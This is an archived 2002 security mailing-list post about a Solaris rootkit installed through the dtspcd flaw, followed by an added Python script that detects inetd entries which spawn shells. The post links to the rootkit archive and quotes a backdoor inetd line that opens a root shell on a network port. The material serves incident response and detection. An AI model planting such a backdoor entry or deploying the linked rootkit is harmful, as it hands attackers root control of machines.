Security Incidents mailing list archives

NSDAP Solaris rootkit and tripwire report online


From: SecLists <lists () secure stargate net>
Date: Thu, 14 Feb 2002 15:28:14 -0500 (EST)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have posted the rootkit and tripwire report online for everyone:

http://codepiranha.org/~pakkit/rootkits/nsdap.tar.gz
http://codepiranha.org/~pakkit/rootkits/tripwire_report.txt

The initial break-in was the result of the dtspcd vulnerability addressed
by Sun last month...

Also, what is not shown in the tripwire report is /tmp/z, containing the
following:

rje stream tcp nowait root /bin/sh sh -i

thanks,
shawn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (OpenBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8bB3k3Qw8DHute6kRAvz9AKCL5ruhSdltCDyWg6yo6B+KL4X5UwCfY7JO
6jHkoCsfSm3n4f7kuOvYOFA=
=xd49
-----END PGP SIGNATURE-----
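
Added example, not part of the original post: the line quoted from /tmp/z follows the inetd.conf field layout (service, socket type, protocol, wait flag, user, server program, arguments) and hands any connection to the rje service to a root shell. The Python check below flags such entries in any inetd.conf-style text; the shell-name list and the sample input are assumptions constructed for illustration.

```python
import os

# Assumption: basenames treated as shells; extend for your environment.
SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh", "jsh"}
SOCKET_TYPES = {"stream", "dgram", "raw", "seqpacket", "tli"}


def parse_inetd_line(line):
    """Return a dict for an inetd.conf-style entry, or None if the line is not one."""
    line = line.split("#", 1)[0].strip()
    fields = line.split()
    # service, socket type, protocol, wait flag, user, server program, then argv
    if len(fields) < 6 or fields[1] not in SOCKET_TYPES:
        return None
    if fields[3].split(".")[0] not in ("wait", "nowait"):
        return None
    return {"service": fields[0], "socket": fields[1], "proto": fields[2],
            "wait": fields[3], "user": fields[4], "program": fields[5],
            "argv": fields[6:]}


def shell_entries(text):
    """Yield (line_number, entry) for entries that hand the connection to a shell."""
    for number, line in enumerate(text.splitlines(), 1):
        entry = parse_inetd_line(line)
        if entry is None:
            continue
        names = {os.path.basename(entry["program"])}
        if entry["argv"]:
            names.add(os.path.basename(entry["argv"][0]).lstrip("-"))
        if names & SHELLS:
            yield number, entry


# Constructed sample: two ordinary Solaris-style entries plus the line from the post.
SAMPLE = """\
# constructed inetd.conf-style sample
ftp     stream  tcp  nowait  root  /usr/sbin/in.ftpd     in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
rje stream tcp nowait root /bin/sh sh -i
"""

if __name__ == "__main__":
    for number, entry in shell_entries(SAMPLE):
        print(f"line {number}: service={entry['service']} user={entry['user']} "
              f"runs {entry['program']} {' '.join(entry['argv'][1:])}")
```

Run it over stray files in world-writable directories as well as /etc/inetd.conf, since the file in this incident sat in /tmp and was not covered by the tripwire report.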




